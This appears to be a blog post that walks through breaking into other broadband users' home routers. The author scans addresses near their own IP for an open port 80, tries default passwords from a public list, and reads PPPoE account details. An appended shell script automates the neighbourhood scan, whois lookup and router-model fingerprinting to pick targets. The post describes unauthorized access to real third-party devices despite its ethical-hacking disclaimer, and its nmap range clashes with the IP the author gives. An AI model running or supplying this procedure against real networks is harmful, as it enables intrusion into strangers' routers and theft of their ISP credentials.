1. To check my actual network IP address: http://www.whatismyip.com
2. A dictionary of common router passwords: http://www.routerpasswords.com
3. nmap and whois tools available in Linux. [Try “nmap --help” for a quick description of the switches available. whois is self-explanatory.]
If users leave the router's web admin interface reachable from the WAN side, still protected by its factory default password, it is too easy to reach the router settings of broadband users: the admin page answers on port 80 of the public IP, and the default credentials are published.
First I checked my actual IP address @ http://www.whatismyip.com
I found that it is 117.192.11.xxx
So I ran nmap on this range on port 80:
$ nmap 188.8.131.52-255 -p80 > scanres
I opened the file scanres in vi and searched for “open”. I found the following entries:
In order to check some more information like who the IP belongs to, I used:
$ whois 117.192.11.xxx
Now I have got a vulnerable IP with port 80 open. I tried opening it in Firefox and it asked for the username and password:
I tried out default usernames and passwords for some common routers in India from www.routerpasswords.com and I could hack into the router in 4/5 tries. [Sometimes the authentication string (the HTTP Basic realm shown in the login prompt) gives away the make of the router. For example TD-W8901G means a TP-Link router, IB-xxxxx means an iBall router. Some manufacturers must be real dumb to do it!] I entered the Interface Setup and could find the PPPoE username. A password field showing 8 dots almost always means “password”. As users have no way of changing it, the “password” is as good as hard-coded.
Finding a weak router takes around 40 seconds for a seasoned hacker: instead of scanning the whole block, he scans only the addresses within +/-25 of his own IP, which are on the same ISP and usually the same kind of CPE, so a handful of default-credential attempts against each host with port 80 open is enough.
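The procedure above (work out the +/-25 range around your own address, scan it for port 80, pull out the hosts that answer, then look at whois and the login realm) as a small POSIX shell script. This is an added example, not code from the original post. It assumes nmap, curl and whois are installed, that you pass your own public IP as the argument (the post reads it from whatismyip.com), and that the range width of +/-25 is the one the post suggests; the realm-to-vendor mapping uses only the two prefixes the post mentions, and the nmap output used for the offline demo is constructed, not a real scan.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes: nmap, curl, whois on PATH.

# Build the nmap target expression for the 51 addresses centred on your own IP,
# clamped to the usable host range 1-254 of the /24 (the post's +/-25 trick).
scan_range() {
    ip=$1
    prefix=${ip%.*}          # first three octets
    last=${ip##*.}           # fourth octet
    lo=$((last - 25)); if [ "$lo" -lt 1 ]; then lo=1; fi
    hi=$((last + 25)); if [ "$hi" -gt 254 ]; then hi=254; fi
    printf '%s.%s-%s\n' "$prefix" "$lo" "$hi"
}

# From nmap's grepable output (-oG), print the IP of every host whose port 80
# is reported open. Reads a file if given, otherwise stdin. This replaces
# opening scanres in vi and searching for "open".
open_http_hosts() {
    awk '/^Host:/ && index($0, "80/open/tcp") { print $2 }' "${1:--}"
}

# Fetch the router login page headers and extract the HTTP Basic realm; as the
# post notes, the realm often carries the model name (e.g. TD-W8901G).
auth_realm() {
    curl -s -m 5 -D - -o /dev/null "http://$1/" |
        sed -n 's/.*[Rr]ealm="\([^"]*\)".*/\1/p' | head -n 1
}

# Map a realm string to a vendor using the two prefixes given in the post.
vendor_hint() {
    case $1 in
        TD-*) echo "TP-Link" ;;
        IB-*) echo "iBall" ;;
        *)    echo "unknown" ;;
    esac
}

# First line of whois that names the block owner (descr: for APNIC ranges,
# OrgName:/org-name: for ARIN/RIPE style output).
whois_owner() {
    whois "$1" | awk '/^(descr|OrgName|org-name):/ { sub(/^[^:]*:[ \t]*/, ""); print; exit }'
}

# End-to-end: scan the neighbourhood of $1 on port 80, save grepable output in
# scanres.gnmap, and report owner, realm and vendor guess for each open host.
# Only point this at addresses you are allowed to test.
scan_neighbourhood() {
    range=$(scan_range "$1")
    nmap -p80 -oG scanres.gnmap "$range" >/dev/null
    open_http_hosts scanres.gnmap | while read -r host; do
        realm=$(auth_realm "$host")
        printf '%s\towner=%s\trealm=%s\tvendor=%s\n' \
            "$host" "$(whois_owner "$host")" "$realm" "$(vendor_hint "$realm")"
    done
}

# Constructed sample of nmap -oG output (not a real scan) so the parser can be
# tried offline: two hosts with 80 open, one closed, one filtered.
sample_scan() {
    printf '# Nmap scan initiated as: nmap -p80 -oG - 117.192.11.17-67\n'
    printf 'Host: 117.192.11.17 ()\tStatus: Up\n'
    printf 'Host: 117.192.11.17 ()\tPorts: 80/closed/tcp//http///\n'
    printf 'Host: 117.192.11.37 ()\tPorts: 80/open/tcp//http///\n'
    printf 'Host: 117.192.11.40 ()\tPorts: 80/filtered/tcp//http///\n'
    printf 'Host: 117.192.11.58 ()\tPorts: 80/open/tcp//http///\n'
    printf '# Nmap done -- 51 IP addresses (4 hosts up) scanned\n'
}

# Usage: sh neighbourhood.sh 117.192.11.42   (runs the live scan)
#        sample_scan | open_http_hosts        (offline demo of the parser)
if [ $# -gt 0 ]; then scan_neighbourhood "$1"; fi
```

Using -oG instead of redirecting the human-readable output keeps one host per line, which is what makes the awk filter reliable; the live path is the only part that needs network access, everything else (range arithmetic, parsing, realm-to-vendor lookup) can be exercised on the constructed sample.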
DISCLAIMER: THIS IS STRICTLY A DEMONSTRATION OF ETHICAL HACKING AND TO ALERT PEOPLE SO THEY CAN GUARD THEMSELVES AGAINST SUCH VULNERABILITIES. PLEASE DO NOT USE THIS INFORMATION FOR DATA THEFT. THAT’S NOT MY INTENTION.